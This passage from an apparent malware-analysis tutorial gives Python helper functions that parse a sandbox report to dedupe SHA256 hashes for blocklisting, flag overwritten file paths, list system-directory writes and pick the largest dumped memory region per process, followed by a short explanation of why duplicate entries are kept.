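    """Paths seen with more than one distinct SHA256: the file was overwritten
    (e.g. a loader re-fetching a stage), so one hash is not enough to block it."""
    by_path = defaultdict(set)
    for f in files:
        if "SHA256" in f:
            by_path[f["path"]].add(f["SHA256"])
    return {p: sorted(s) for p, s in by_path.items() if len(s) > 1}

def unique_sha256(files):
    """Deduplicated hash set for a blocklist or retro-hunt."""
    return sorted({f["SHA256"] for f in files if "SHA256" in f})

def system_writes(files):
    """Distinct paths outside the user profile: writes that need elevated
    rights (heuristic of this example, not a claim the report makes)."""
    return sorted({f["path"] for f in files
                   if not f["path"].lower().startswith(r"c:\users")})

def largest_region_per_pid(regions):
    """Biggest dumped range per PID, a first pick when unpacking payloads."""
    best = {}
    for r in regions:
        if r["pid"] not in best or r["size"] > best[r["pid"]]["size"]:
            best[r["pid"]] = r
    return best

if __name__ == "__main__":
    files, regions = parse_listing(SAMPLE)
    print(len(files), "entries,", len(unique_sha256(files)), "unique SHA256")
    print("rewritten:", rewritten_paths(files))
    print("system writes:", system_writes(files))
    print("largest region per pid:", largest_region_per_pid(regions))
```

Run it directly for the excerpt, or feed the whole section to parse_listing() for the full file set. Duplicates are kept in `files` rather than collapsed at parse time: a repeated path with identical hashes tells you the file was written twice, while a repeated path with different hashes (mi.exe above) tells you that blocking a single hash will not stop the next stage.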